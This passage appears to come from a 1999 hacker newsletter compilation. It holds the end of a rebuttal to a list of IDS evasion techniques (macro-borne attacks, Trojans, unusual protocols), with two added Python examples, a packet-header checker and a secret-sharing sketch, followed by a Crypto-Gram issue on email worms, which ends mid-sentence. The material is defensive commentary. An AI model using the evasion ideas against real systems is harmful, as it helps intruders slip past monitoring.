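Run stand-alone it prints two lines: one STORM record for the 300 probe alerts and one ALERT for the single event that differs. The storm record itself is worth keeping as an event, since, as the rebuttal observes, a flood of detected noise tends to raise the defenders' awareness rather than lower it.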
43 - Plant the intrusion instructions within a Word macro and send a document to the victim. The IDS
probably can't decode the attack inside the macro.
See 34. Some products such as RealSecure do look for suspicious JAVA and ActiveX downloads. Proxy
firewalls that perform virus checking may also identify this attack.
44 - Plant the intrusion code within another macro and send to victim. Power point perhaps, or 123, or ...
you get the idea.
See 43 & 34. This is another example of how these 50 techniques are not 50 unique techniques.
45 - Put the attack in a compiled program (i.e., a Trojan Horse) and get the victim to download the attack
and run it for you.
This is a classic all time attack. Common Trojan Horses can be detected by many host based and network
based IDS products. Some firewalls now even recognize Back-Orifice scans. On the other hand, this is one
of the most serious problems in computer security today. It is almost impossible to examine binary
programs or even source code and predict exactly what the program will do. So, yeah, IDS products can't
do this, but it's not a compelling reason to throw away your IDS. Most IDS or firewall products can't
discover when you're about to send sensitive corporate information via email either.
46 - Use a rarely used protocol for the attack. Chances are the IDS doesn't know how to interpret the
packets.
Protocol is not a well defined term. If this is meant as a different UDP/TCP port then the network IDS
would need to understand what it is looking for. But this is how most network based IDS products work.
They only look for things they understand or can understand to be suspicious. If this attack represents other
IP protocols than ICMP, UDP and TCP, then most IDS products can be configured to alert on them.
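The rebuttal's answers to 33 (source routed packets are dropped and logged), 39 and 40 (tunnelled protocols) and 46 (IP protocols other than ICMP, UDP and TCP can be alerted on) all come down to looking at the IPv4 header itself. As an added example that is not part of the rebuttal or Mr. Cohen's article, this minimal checker parses the header of a constructed packet and reports loose or strict source route options and any IP protocol number outside an assumed expected set. The option type values come from RFC 791; the expected-protocol set and the sample packets are assumptions for the example.

```python
"""
Added example (not from Cohen's article or the rebuttal): a minimal IPv4
header checker that flags the two things the rebuttal says defenders already
watch for, source-routed packets (item 33) and unexpected IP protocol
numbers such as tunnels (items 39, 40, 46).
"""
import struct

# IPv4 option type bytes from RFC 791: loose and strict source routing.
OPT_LSRR = 0x83
OPT_SSRR = 0x89
OPT_EOL = 0x00
OPT_NOP = 0x01

# Protocols the monitored network is expected to carry (assumption for the example).
EXPECTED_PROTOCOLS = {1: "ICMP", 6: "TCP", 17: "UDP"}
PROTOCOL_NAMES = {**EXPECTED_PROTOCOLS, 4: "IP-in-IP", 47: "GRE"}


def build_ipv4(src, dst, proto, options=b"", payload=b""):
    """Construct a sample IPv4 packet (constructed test input, not captured traffic)."""
    if len(options) % 4:                       # options are padded to a 32-bit boundary
        options += b"\x00" * (4 - len(options) % 4)
    ihl = 5 + len(options) // 4
    total_len = ihl * 4 + len(payload)
    header = struct.pack("!BBHHHBBH4s4s",
                         (4 << 4) | ihl, 0, total_len, 0, 0, 64, proto, 0,
                         bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return header + options + payload


def parse_options(raw):
    """Walk the IPv4 option list and return the option type bytes present."""
    types = []
    i = 0
    while i < len(raw):
        t = raw[i]
        if t == OPT_EOL:
            break
        if t == OPT_NOP:
            i += 1
            continue
        types.append(t)
        if i + 1 >= len(raw):
            break           # truncated option: stop rather than read past the end
        length = raw[i + 1]
        if length < 2:
            break           # malformed length: avoid looping forever
        i += length
    return types


def check_packet(pkt):
    """Return a list of alert strings for one packet (empty list means nothing notable)."""
    if len(pkt) < 20:
        return ["truncated IPv4 header"]
    ver_ihl, _, _, _, _, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = ver_ihl & 0x0F
    if ver_ihl >> 4 != 4 or ihl < 5:
        return ["not a well-formed IPv4 header"]
    src_s = ".".join(map(str, src))
    dst_s = ".".join(map(str, dst))
    alerts = []
    for t in parse_options(pkt[20:ihl * 4]):
        if t in (OPT_LSRR, OPT_SSRR):
            kind = "loose" if t == OPT_LSRR else "strict"
            alerts.append(f"{kind} source route option from {src_s} to {dst_s}")
    if proto not in EXPECTED_PROTOCOLS:
        name = PROTOCOL_NAMES.get(proto, f"protocol {proto}")
        alerts.append(f"unexpected IP protocol {name} ({proto}) from {src_s} to {dst_s}")
    return alerts


if __name__ == "__main__":
    lsrr = bytes([OPT_LSRR, 7, 4]) + bytes([192, 168, 1, 1])   # one-hop loose source route
    for pkt in (build_ipv4("10.0.0.5", "10.0.0.9", 6),
                build_ipv4("10.0.0.5", "10.0.0.9", 6, options=lsrr),
                build_ipv4("10.0.0.5", "10.0.0.9", 47)):
        print(check_packet(pkt) or ["ok"])
```

A plain TCP packet produces no alert; the same packet carrying a loose source route option, or a GRE packet on a network that expects only ICMP, TCP and UDP, each produce one. The protocol check is the whole of what the rebuttal means by "configured to alert on them" for item 46: the IDS does not need to understand the tunnelled payload to notice that the outer protocol is out of place.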
47 - Recode the attack in a different language than it was originally published in.
I don't think this works. Consider the check-cgi program that has been floating around for a few months
now and checks for 70+ vulnerable CGI-BIN programs. It has been ported from C to Rebol without any
difference at the network layer. This attack only works if the IDS is searching for a specific binary
program. Most traditional IDS products don't do this.
48 - Use any non-technical attack (such as so-called human engineering). Since the IDS only looks at bits
and bytes, it doesn't detect many of the common attacks used by attackers today.
Yes, but building alarm systems, background checks, cameras, employee training programs and many other
systems are available to thwart these techniques. There are even legal techniques to prevent competitors
from hiring away key personnel.
49 - Attack any system that doesn't run Unix. Since almost all of today's IDS systems only look for Unix
attacks, everything else will pass undetected. (Some apparently detect NT attacks now as well.)
A quick survey reveals that NetProwler, NFR Flight Jacket, NetRanger, RealSecure, Dragon and
BlackICE all detect a multitude of Windows NT attacks.
50-1000+ - Use one of the 1000 or so published attacks not detected by current systems. The largest
number of detected attacks I have seen advertised to date as being detected by any such system is only
about 50. (One vendor recently claimed over 150, but the newest numbers I heard for known vulnerabilities
have gone up to 2,000.) Nevertheless, 150 is progress over 50!
Where are these published 1000 attacks? When checking sites like Packetstorm and Rootshell, most of the
major attacks are covered by IDS products. There is always an IDS gap where new attacks require new
signatures to be developed, but for the most part, published vulnerabilities tend to have IDS products that
detect them.
------------------------------------------------------------------------
Bonus attacks - 1000+ to infinity - Create a new attack script. IDS systems today almost all look only for a
small number of known attacks.
------------------------------------------------------------------------
See 50-1000+.
Conclusion
It is very hard to measure intrusion detection systems and network security because the topic is extremely
vague and subject to opinion. I hope that this paper will cause some debate and generate some discussion
about the role intrusion detection can play in our networks. It should be obvious to the reader that the
author truly feels that an IDS can be an extremely useful part of a secure network. I do acknowledge that all
IDS products could be better and can't save the world, but they should not be discounted so easily.
@HWA
106.0 June 15th: Bruce Schneier's Cryptogram
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mailing-List: contact crypto-gram-help@chaparraltree.com; run by ezmlm
Precedence: bulk
Delivered-To: mailing list crypto-gram@chaparraltree.com
Delivered-To: moderator for crypto-gram@chaparraltree.com
Received: (qmail 11631 invoked from network); 16 Jun 1999 21:14:32 -0000
Message-Id: <4.1.19990616161311.009ebe60@chaparraltree.com>
X-Sender: schneier@counterpane.com (Unverified)
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Wed, 16 Jun 1999 16:14:40 -0500
To: crypto-gram@chaparraltree.com
From: Bruce Schneier
Subject: CRYPTO-GRAM, June 15, 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
CRYPTO-GRAM
June 15, 1999
by Bruce Schneier
President
Counterpane Systems
schneier@counterpane.com
http://www.counterpane.com
A free monthly newsletter providing summaries, analyses, insights, and
commentaries on cryptography and computer security.
Back issues are available at http://www.counterpane.com. To subscribe or
unsubscribe, see below.
Copyright (c) 1999 by Bruce Schneier
** *** ***** ******* *********** *************
In this issue:
E-Mail Viruses, Worms, and Trojan Horses
Counterpane Systems -- Featured Research
News
Counterpane Systems News
The Doghouse: Shopping.com
The Other Doghouse: ChecksNet
Hacking Archives on the WWW
International Encryption Policy
International Encryption Products
Comments from Readers
** *** ***** ******* *********** *************
E-Mail Viruses, Worms, and Trojan Horses
Looking back from the future, 1999 will have been a pivotal year for
malicious software: viruses, worms, and Trojan horses (collectively known
as "malware"). It's not more malware; we've already seen thousands. It's
not Internet malware; we've seen that before, too. But this is the first
year we've seen malware that uses e-mail to propagate over the Internet and
tunnel through firewalls. And it's a really big deal.
Viruses and worms survive by reproducing on new computers. Before the
Internet, computers communicated mostly through floppy disks. Hence, most
viruses propagated on floppy disks, and sometimes on computer bulletin
board systems (BBSs).
There are some obvious effects of floppies as a vector. First, malware
propagates slowly. One computer shares a disk with another which shares a
disk with five more, and over the course of weeks or months a virus turns
into an epidemic. Or maybe someone puts a virus-infected program on a
bulletin board, and thousands get infected in a week or two.
Second, it's easy to block disk-borne malware. Most anti-virus programs
can automatically scan all floppy disks. Malware is blocked at the gate.
BBSs can still be a problem, but many computer users are trained never to
download software from a BBS. Even so, anti-virus software can
automatically scan new files for malware.
And third, anti-viral software can easily deal with the problem. It's easy
to write software to block malware you know about. You simply have the
anti-virus scanner search for bit strings that signify the virus (called a
"signature") and then execute the automatic program to delete the virus and
restore normalcy. This deletion routine is unique per virus, but it is not
hard to develop. Anti-viral software has tens of thousands of signatures,
each tuned to a particular virus. Companies release them within a day of
learning of a new virus. And as long as viruses propagate slowly, this is
good enough. My software automatically updates itself once a month. Until
1999, that was enough.
What's new in 1999 is e-mail propagation of malware. These programs -- the
Melissa virus and its variants, the Worm.ExploreZip worm and its inevitable
variants, etc. -- arrive via e-mail and use e-mail features in modern
software to replicate themselves across the network. They mail themselves
to people known to the infected host, enticing the recipients to open or
run them. They don't propagate over weeks and months; they propagate in
seconds. Anti-viral software cannot possibly keep up.
And e-mail is everywhere. It runs over Internet connections that block
everything else. It tunnels through all firewalls. Everyone uses it.
It's easy to point fingers at Microsoft. Melissa uses features in
Microsoft Word (and variants use Excel) to automatically e-mail itself to
others, and Melissa and Worm.ExploreZip make use of the automatic mail
features of Microsoft Outlook. Microsoft is certainly to blame for
creating the powerful macro capabilities of Word and Excel, blurring the
distinction between executable files (which can be dangerous) and data
files (which, before now, were safe). They will be to blame when Outlook
2000, which supports HTML, makes it possible for users to be attacked by
HTML-based malware simply by opening an e-mail. Microsoft set the security
state-of-the-art back 25 years with DOS, and they have continued that
legacy to this day. They certainly have a lot to answer for, but the
meta-problem is more subtle.
One problem is the permissive nature of the Internet and the computers
attached to it. As long as a program has the ability to do anything on the
computer it is running on, malware will be incredibly dangerous. Just as
firewalls protect different computers on the same network, we're going to
need something similar to protect different processes running on the same
computer.
This cannot be stopped at the firewall. This type of malware tunnels
through a firewall using e-mail, and then pops up on the inside and does
damage. So far the examples have been mild, but they represent a proof of
concept. And the effectiveness of firewalls will diminish as we open up
more services (e-mail, Web, etc.), as we add increasingly complex
applications on the internal net, and as crackers catch on. This
"tunnel-inside-and-play" technique will only get worse.
And anti-virus software can't help much. If a virus can infect 1.2 million
computers (one estimate of Melissa infections) in the hours before a fix is
released, that's a lot of damage. What if the code took pains to hide
itself, so that a virus won't be discovered for a couple of days? What if
a worm just targeted an individual; it would delete itself off any computer
whose userID didn't match a certain reference? How long would it take
before that one is discovered? What if it e-mailed a copy of the user's
login script (most contain passwords) to an anonymous e-mail box before
self-erasing? What if it automatically encrypted outgoing copies of itself
with PGP or S/MIME? Or signed itself; signing keys are often left lying
around the system. Even a few minutes of thinking about this yields some
pretty scary possibilities.
It's impossible to push the problem off onto users with "do you trust this
message/macro/application" messages. Sure, it's unwise to run executables
from strangers, but both Melissa and Worm.ExploreZip arrive pretending to
be friends and associates of the recipient. Worm.ExploreZip even replied
to real subject lines. Users can't make good security decisions under
ideal conditions; they don't stand a chance against a virus capable of
social engineering.
What we're seeing here is the convergence of several problems: the
permissiveness of networks, interconnections between applications on modern
operating systems, e-mail as a vector to tunnel through network defenses
and as a means to spread extremely rapidly, and the traditional naivete of
users. Simple patches won't fix this. There are some interesting
technologies on the horizon that try to mimic the body's own immune system
to automatically deal with unknown malware, but I am not very optimistic
about them. Sure they'll catch some things, but it will always be possible
to design malware specifically to defeat the immune systems. A large
distributed system that communicates at the speed of light is going to have
to accept the reality of viral infections at the speed of light. Unless
security is designed into the system from the bottom up, we're constantly
going to be fighting a holding action.
Melissa:
http://www.zdnet.com/zdnn/stories/news/0,4586,2233116,00.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2234121,00.html
Worm.ExploreZip
http://www.zdnet.com/zdnn/stories/news/0,4586,2274306,00.html
http://www.wired.com/news/news/politics/story/20160.html
http://www.symantec.com/press/1999/n990614d.html
** *** ***** ******* *********** *************
Counterpane Systems -- Featured Research
"Protecting Secret Keys with Personal Entropy"
C. Ellison, C. Hall, R. Milbert, and B. Schneier, FUTURE GENERATION
COMPUTER SYSTEMS, to appear.
Conventional encryption technology often requires users to protect a secret
key by selecting a password or passphrase. While a good passphrase will
only be known to the user, it also has the flaw that it must be remembered
exactly in order to recover the secret key. As time passes, the ability to
remember the passphrase fades and the user may eventually lose access to
the secret key. We propose a scheme whereby a user can protect a secret key
using the "personal entropy" in his own life, by encrypting the passphrase
using the answers to several personal questions. We designed the scheme so
the user can forget answers to a subset of the questions and still recover
the secret key, while an attacker must learn the answer to a large subset
of the questions in order to recover the secret key.
http://www.counterpane.com/personal-entropy.html
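As an added example (not the paper's own construction, and not code from Counterpane), here is a sketch of how the "forget some answers, still recover the key" property in the abstract can be built: the key is split with Shamir secret sharing at threshold t over n questions, and each share is masked with a hash of its answer. Any t correct answers unmask enough shares to interpolate the key; a wrong or forgotten answer only spoils its own share. The questions, answers, field prime, key and the short check tag used to recognise a correct recovery are all assumptions constructed for this example.

```python
"""
Added example, not the paper's construction: a sketch of the "personal
entropy" idea using Shamir secret sharing over a prime field. Each share is
masked with a hash of one answer, so any t correct answers out of n recover
the key while a forgotten or wrong answer only spoils its own share. The
questions, answers, prime and key below are constructed for the example.
"""
import hashlib
import itertools
import secrets

P = 2**127 - 1          # prime field; the key must be smaller than P


def _eval_poly(coeffs, x):
    """Horner evaluation of the sharing polynomial at x, modulo P."""
    y = 0
    for c in reversed(coeffs):
        y = (y * x + c) % P
    return y


def _answer_mask(i, answer):
    """Derive the per-question mask from a normalised answer (case and whitespace folded)."""
    norm = " ".join(answer.lower().split())
    return int.from_bytes(hashlib.sha256(f"{i}:{norm}".encode()).digest(), "big") % P


def _key_check(key):
    """Short tag used only to recognise a correctly recovered key (assumption of this sketch)."""
    return hashlib.sha256(b"check:" + key.to_bytes(16, "big")).hexdigest()[:16]


def protect(key, answers, t):
    """Split key into len(answers) shares with threshold t; mask each share with its answer."""
    assert 0 <= key < P and 1 <= t <= len(answers)
    coeffs = [key] + [secrets.randbelow(P) for _ in range(t - 1)]
    masked = [(i, (_eval_poly(coeffs, i) + _answer_mask(i, a)) % P)
              for i, a in enumerate(answers, start=1)]
    return masked, _key_check(key)


def _interpolate_zero(points):
    """Lagrange interpolation at x = 0 over the field, giving the constant term (the key)."""
    secret = 0
    for xj, yj in points:
        num = den = 1
        for xm, _ in points:
            if xm != xj:
                num = num * (-xm) % P
                den = den * (xj - xm) % P
        secret = (secret + yj * num * pow(den, P - 2, P)) % P
    return secret


def recover(masked, check, attempts, t):
    """attempts maps question index to the answer given. Unmask the shares that were
    answered, try every t-subset, and return the key whose check tag matches, or None."""
    points = [(i, (y - _answer_mask(i, attempts[i])) % P) for i, y in masked if i in attempts]
    for subset in itertools.combinations(points, t):
        key = _interpolate_zero(subset)
        if _key_check(key) == check:
            return key
    return None


if __name__ == "__main__":
    KEY = 0x0123456789abcdef0123456789abcdef          # constructed 128-bit value below P
    ANSWERS = ["Rover", "Maple Street", "Mrs. Thompson", "blue", "Chicago"]   # constructed
    masked, check = protect(KEY, ANSWERS, t=3)
    print(recover(masked, check, {1: "rover", 3: "mrs. thompson", 5: "chicago"}, 3) == KEY)
    print(recover(masked, check, {1: "rover", 3: "mrs. thompson"}, 3))        # None
```

With n = 5 and t = 3 the user may forget any two answers; an attacker who learns fewer than three answers holds fewer than t unmasked shares and gains nothing about the key from the rest. The subset search lets one wrong answer among four attempts still succeed, which is the usability point the abstract makes about forgetting a subset of the questions.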
** *** ***** ******* *********** *************
News
Hushmail is like Hotmail, but encrypted. They implement SSL from the
browser to the server, and Blowfish to encrypt messages. Free secure
e-mail for the masses. Their source code is available via free download.
Furthermore, they developed their product off-shore, so they don't face any
export restrictions. I haven't seen any evaluations of the code, but it's
certainly a good idea.
News story:
http://www.wired.com/news/news/email/explode-infobeat/technology/story/19804.html
Hushmail homepage:
http://www.hushmail.com
Technical summary: https://www.hushmail.com/tech_description.htm
Source code: http://www.cypherpunks.ai/~hush/hush-src.103.zip
And ZipLip is a competing secure web e-mail service:
http://www.techweb.com/wire/story/TWB19990526S0002
I'll write more about both of these products next month.
The French data agency CNIL is investigating Microsoft and Intel, to
determine if their anti-privacy antics violate any European data
protection laws.
http://www.europa.eu.int/comm/dg15/en/media/dataprot/wpdocs/wp16en.htm
http://www.europa.eu.int/comm/dg15/en/media/dataprot/wpdocs/wp17en.htm
A report on how 128-bit crypto was liberated in France.
http://jya.com/jospin-coup.htm
The United States has been accused of using key-escrow to steal secrets.
http://www.techweb.com/wire/story/TWB19990518S0004
http://www.nytimes.com/techweb/TW_Report_U_S_Uses_Key_Escrow_To_Steal_Secrets.html
How to discuss Blowfish with your children.
http://www.hcs.harvard.edu/~demon/issues/apr_26_1999/blowfish/blowfish.html
There are rumors that the CIA is using computers to attack the foreign bank
accounts of Yugoslav leader Milosevic.
http://www.techweb.com/wire/story/reuters/REU19990524S0001
"We've lately had reason to wonder if our nation's cryptography policy is
being made by fools. It is a mixed blessing to learn that the people in
charge are merely liars." A good editorial.
http://www.zdnet.com/pcweek/stories/columns/0,4351,403283,00.html
OpenSSL, an open-source toolkit for SSL and TLS, version 0.9.3 has been
released.
http://www.openssl.org/
Here's a site that provides random primitive and irreducible polynomials,
useful for stream-cipher construction.
http://www.dmi.ens.fr/~chabaud/Poly/polyform.html
U.S. banks are opening a lab to test computer security products.
http://www.news.com/News/Item/0,4,36923,00.html
The Electronic Telegraph has an interesting feature on the security of
safes: how they're made, how they can be attacked. I never realized that
safes were rated according to how much insurance you can get on cash contents.
http://www.telegraph.co.uk:80/et?ac=000647321007942&rtmo=Q9QwSezR&atmo=99999999&pg=/et/99/5/13/ecfsafe13.html
Good news department: The U.K. has reversed its position on key escrow.
Blair's government has dropped a proposal that would have required it.
http://www.infoworld.com/cgi-bin/displayStory.pl?990527.icblair.htm
Someone wrote an Enigma-machine simulator that runs on an iButton. So you
can have an Enigma-machine secret decoder ring.
http://www.javaworld.com/jw-08-1998/jw-08-indepth.html
The National Security Study Group (some government agency or another)
launched a web site (http://www.nssg.gov) to encourage and gather public
comment on national security in the 21st century. Be nice and don't hack
them for a week or so.
http://www.fcw.com/pubs/fcw/1999/0531/fcw-agsitesurv-05-31-99.html
Send secret messages in DNA.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_365000/365183.stm
http://news.excite.com/news/r/990610/02/science-dna-microdot
http://www.cnn.com/NATURE/9906/10/top.secret.dna.ap/
GCHQ, the British NSA-equivalent, is moving. Their new site will house
4500 people, and should be completed by 2002.
http://www.guardianunlimited.co.uk/Archive/Article/0,4273,3862710,00.html
Germany goes on record as being in favor of strong cryptography. It seems
they don't trust the U.S. not to spy on them.
http://www.wired.com/news/news/politics/story/20023.html
** *** ***** ******* *********** *************
Counterpane Systems News
The Black Hat Briefings '99 is a Computer Security Conference scheduled for
July 7 and 8 in Las Vegas, Nevada. DefCon is a hackers convention held the
weekend after. Bruce Schneier will be speaking at both.
http://www.blackhat.com/
http://www.defcon.org/
** *** ***** ******* *********** *************
The Doghouse: Shopping.com
For security-clueless shopping, you can't beat this one: "Shopping.com
uses RSA Laboratories commercial encryption suited for U.S. export
(RC4-Export, 128 bit with 40 secret). What does that mean to you? RSA
protects your sensitive communications over the Internet (such as a credit
card number) by transforming the data into an unreadable format.
Furthermore, Shopping.com ensures the privacy of the information not only
online, but through our back-end systems." Wow. I am in awe.
http://www.shopping.com/store/INFO/INFO_SECURE.ASP?nav=|-1|-1|-1|-1|-1&x=cgi-bin
** *** ***** ******* *********** *************
The Other Doghouse: ChecksNet
You too can send your bank account name and routing information in the
clear over the net. Order your checks from these people. Their Web page
clearly states: "ChecksNet protects your personal and bank account
information from theft or misuse by encoding and scrambling the data as it
is transmitted from this website to us." However, the order form is sent
in the clear; they don't use SSL.
http://www.checksnet.com/order.htm
** *** ***** ******* *********** *************
Hacking Archives on the WWW
There's a lot of hacking information on the WWW, but you have to take the
time to look for it. Typing "hacker archive" into AltaVista results in
over three million hits. Yahoo's information is much better organized, but
there's still a lot of pages to wade through.
A great starting site is
http://www.infoworld.com/cgi-bin/displayNew.pl?/security/links/security_corner.htm. These guys write a weekly security column for InfoWorld, and their
site is a wealth of useful security links. When I'm looking for something,
I usually go there first.
The content site I spent the most time at was
http://www.genocide2600.com/~tattooman/main.shtml, because it seemed
well-organized. Nevertheless, it was clear that this is an archive, not a
directory. If you're trying to find a particular hack for a particular
piece of software on a particular operating system, expect to spend some
time searching. The material is sorted by general category, but the
descriptions are limited. On the other hand, if you're looking for
write-ups of the latest security holes and exploits, it's neatly sorted by
date.
For a non-hacker like me, most of this material is way beyond my level of
expertise. Still, there's also a fair amount of scary and useful stuff.
Just reading through the archive descriptions is enough to make anyone lose
faith in any kind of network security. In addition to the vulnerabilities
and exploits, there are Windows, Novell, and Unix security tools; password
crackers; miscellaneous hacking tools; general utilities; and -- just in
case you'd forgotten that hacking was a subculture -- humor archives.
There are also links to archives of hacker discussion lists.
Other archives include:
The Electronic Frontier Foundation "hacker" archive.
http://www.eff.org/pub/Net_culture/Hackers/
The archives for 2600 Magazine and for Phrack Magazine.
http://www.2600.com
http://www.phrack.com
And Netscape's hacker page, with links to major hacker sites on the Web.
http://excite.netscape.com/computing_and_internet/programming/hacking
This last one is the Web page I found most interesting, in the abstract.
Hacking has come of age, if Netscape lists the links openly, instead of
trying to pretend they don't exist. In general, hackers (at least in their
public face) are more interested in penetrating systems and exposing
vulnerabilities than in causing damage or stealing money. But most sites
still have legal disclaimers about how the information is only for
educational purposes and is not intended to be used to commit the crimes
that could be attributed to the information provided. First amendment or
not, much of this is a gray area.
** *** ***** ******* *********** *************
International Encryption Policy
EPIC has released its "Cryptography & Liberty 1999: An International Survey
of Encryption Policy." This is an excellent survey on international
encryption policy (it runs about 130 pages), produced by the Electronic
Privacy Information Center (EPIC).
Here's the executive summary:
"Most countries in the world today have no controls on the use of
cryptography. In the vast majority of countries, cryptography may be
freely used, manufactured, and sold without restriction. This is true for
both leading industrial countries and for developing countries. There is a
movement towards international relaxation of regulations relating to
encryption products, coupled with a rejection of key escrow and recovery
policies. Many countries have recently adopted policies expressly
rejecting requirements for key escrow systems and a few countries, most
notably France, have dropped their escrow systems. There are a small
number of countries where strong domestic controls on the use of
cryptography exist. These are mostly countries where human rights command
little respect.
"Recent trends in international law and policy point toward continued
relaxation of controls on cryptography. The Organization for Economic
Cooperation and Development's Cryptography Policy Guidelines and the
Ministerial Declaration of the European Union, both released in 1997, argue
for the liberalization of controls on cryptography and the development of
market-based, user driven cryptography products and services. There is a
growing awareness worldwide of encryption and an increasing number of
countries have developed policies, driven by the OECD guidelines.
"Export controls remain the most powerful obstacle to the development and
free flow of encryption. The revised December 1998 Wassenaar Arrangement
may roll back some of the liberalization sought by the OECD, particularly
by restricting the key lengths of encryption products that can be exported
without approval licenses. However, several major countries have already
indicated that they do not plan to adopt new restrictions.
"The United States government continues to lead efforts for encryption
controls around the world. The U.S. government has exerted economic and
diplomatic pressure on other countries in an attempt to force them into
adopting restrictive policies. The U.S. position may be explained, in
part, by the dominant role that national intelligence and federal law
enforcement agencies hold in the development of encryption policy."
http://www2.epic.org/reports/crypto1999.html
** *** ***** ******* *********** *************
International Encryption Products
The ACP has commissioned a study on the availability of international
encryption products. It's called "Growing Development of Foreign
Encryption Products in the Face of U.S. Export Regulations."
Here are excerpts from the executive summary:
"Development of cryptographic products outside the United States is not
only continuing but is expanding to additional countries; with rapid growth
of the Internet, communications-related cryptography especially is
experiencing high growth, especially in electronic mail, virtual private
network, and IPsec products. This report surveys encryption products
developed outside the United States and provides some information on the
effect of the United States export control regime on American and foreign
manufacturers.
"We have identified 805 hardware and/or software products incorporating
cryptography manufactured in 35 countries outside the United States. The
most foreign cryptographic products are manufactured in the United Kingdom,
followed by Germany, Canada, Australia, Switzerland, Sweden, the
Netherlands, and Israel in that order. Other countries accounted for
slightly more than a quarter of the world's total of encryption products.
"The 805 foreign cryptographic products represent a 149-product increase
(22%) over the most recent previous survey in December 1997. A majority of
the new foreign cryptographic products are software rather than hardware.
Also, a majority of these new products are communications-oriented rather
than data storage oriented; they heavily tend towards secure electronic
mail, IP security (IPsec), and Virtual Private Network applications.
"We identified at least 167 foreign cryptographic products that use strong
encryption in the form of these algorithms: Triple DES, IDEA, Blowfish,
RC5, or CAST-128. Despite the increasing use of these stronger
alternatives to DES, there also continues to be a large number of foreign
products offering the use of DES, though we expect to see a decrease in
coming years.
"On average, the quality of foreign and U.S. products is comparable. There
are a number of very good foreign encryption products that are quite
competitive in strength, standards compliance, and functionality."
http://www.seas.gwu.edu/seas/institutes/cpi/library/docs/cpi-1999-02.pdf
** *** ***** ******* *********** *************
Comments from Readers
From: "John C. Kennedy"
Subject: Novell
Having worked with Novell's security group closely for the last three and a
half years on cryptographic and network security issues, I want to point
out a couple of things that aren't quite apparent about the remote console
password encryption hack that you report on in your latest newsletter.
(Disclaimer: This is in no way an official response from Novell, merely a
constructive comment by an informed party.)
The use of the remote console feature for managing NetWare servers is
something that Novell has advised against for quite some time to begin
with. Server console access is something that Novell strongly recommends
be protected by physical access restrictions:
http://developer.novell.com/research/appnotes/1997/november/06/04.htm
Novell's security experts have *always* considered the use of remote
console capabilities to be a fundamentally risky proposition to begin with.
Console access allows direct access to the NetWare trusted computing base.
However, when customers demand such a feature and are willing to take the
risk it is difficult for any company to say no.
If one assesses network security from a "weakest link in the chain"
perspective, it is the fact that access to console services is available
remotely *at all* that is probably a bigger risk than the weak password
encryption technique employed. Console access is not something that should
be granted based simply on single factor authentication, but in many "low
threat" environments this is an acceptable risk/convenience trade-off to make.
The password obfuscation technique may seem amateurish at first glance, but
it most likely has more to do with some exportability issue than lack of
expertise or knowledge within Novell's security group. The design
pre-dates my association with Novell by a couple of years, but I am
confident that it was not due to ignorance within the security staff.
Obfuscation techniques are not something anyone likes to bet the farm on,
and Novell's strong caveats about the use of rconsole reflect this.
Novell has been working for the last couple of years on an architecture to
permit strong encryption for authentication purposes without allowing that
same capability to be exploited as an uncontrolled method for
confidentiality. This is not an easy problem to tackle, but Novell's new
international cryptographic services architecture in fact solves this
"crypto with a hole" problem for both Novell and its customers.
(http://www.novell.com/corp/security/)
Regardless of one's position on the crypto export issue, we all know that
this has been a real problem for software and hardware vendors for quite
some time. It is especially difficult to solve for companies that ship to
so many different import/export jurisdictions. U.S. export laws are
matched by equally restrictive import laws in many countries. The ability
to field policy-controlled crypto will allow Novell to bring new network
security mechanisms to the global market based on cryptography that is
"strong" by anyone's measure.
I think your chastising of Novell is well-intentioned, but fails to
acknowledge that (1) weak cryptography *is not* always the weakest link in
the security chain and (2) that import/export laws have had predictable
and, to date, largely unavoidable results in software designs destined for
global markets. So-called "strong cryptography" can lend a false sense of
security or be otherwise counterproductive when viewed in the larger
context that many vendors have to address. A context that, in fact, most
casual observers have neither the patience nor the necessary intimate knowledge
to address.
From: "Robert A. Lerche"
Subject: Microsoft's Internet Explorer
MS IE does not provide a means for encrypting downloaded personal
certificates. Netscape prompts for a password and encrypts local storage
(although I think you're allowed to specify a blank password), but MS IE
doesn't.
From: "Jack Hewlett"
Subject: Who's at risk?
You continually publish articles saying how bad various security software
products are. So the obvious question is, "Who's at risk here, the
Retailer or the Consumer?" I've never understood the need to be secretive
about my Credit Card Numbers. It seems to me, I could publish my Credit
Card number in the newspaper, and "I" would not be at any risk!
If a charge appears on my monthly statement and I can show the following:
1. The merchandise was NOT shipped to my address.
2. The Retailer does NOT have a piece of paper containing my signature.
3. The Retailer does NOT have a recording containing my voice.
then surely I'm under no legal obligation to pay that portion of the bill.
This is a very important topic for the individual. If all the risk
associated with weak security software falls on the Retailer, then I don't
have to care about this topic.
If my suppositions are incorrect, then how do I protect myself against all
the clerks who see my Credit Card Number when I use it in a retail
establishment? I understand that I have legal obligations to report a card
stolen when I no longer have physical possession of it. But, since it is
impossible for me to control knowledge of the Number (and Expiration Date),
can the "fine print" of the Credit Acceptance I signed hold me fiscally
responsible for something I can't control? Even if I did sign such terms,
would they hold up in court, when I argue that I did nothing wrong and
acted in a prudent manner?
From: Geoff Thorpe
Subject: Hacking root CAs in Internet Explorer
I note my mate Peter Gutmann's email about substituting root CAs into IE's
"certificate store". I think I actually alerted him to this, and the
problem remains in more recent versions. IE Version 4 also registers the
".der" file extension so that an ASN encoded self-signed X509 CA
certificate saved as cert.der and double-clicked will automatically launch
the "Accept new CA cert?" dialog of IE. By default, all the options are
enabled (ticked), including authenticating client and server certs (https),
authenticating email certs (S/MIME), and software signing (Authenticode).
Even the default button is "OK," so hitting enter is enough. They have,
however, added a new dialog box, so that selecting OK gives a quick "Are
you sure" type warning, displays all the information about the cert
(distinguished name components, expiry dates, etc.) and the default button
in this case is "No" (you have to click Yes to accept it). This still does
not address the fact that most users will not really grasp the gaping
security hole this creates for them -- though at least Netscape
Communicator goes some way towards letting them know you REALLY should
check up on the cert's authenticity before giving it too much trust -- and
they have a neat option to always provide warnings when using certs signed
by the new CA cert in question.
There's a very dangerous attack permitted by this lax attitude towards
accepting CA certs. If you can get anyone with an Authenticode signing key
(perhaps a developer has a signed cert from Verisign or whoever) to accept
a phony CA cert, then all hell can break loose. You can then get native
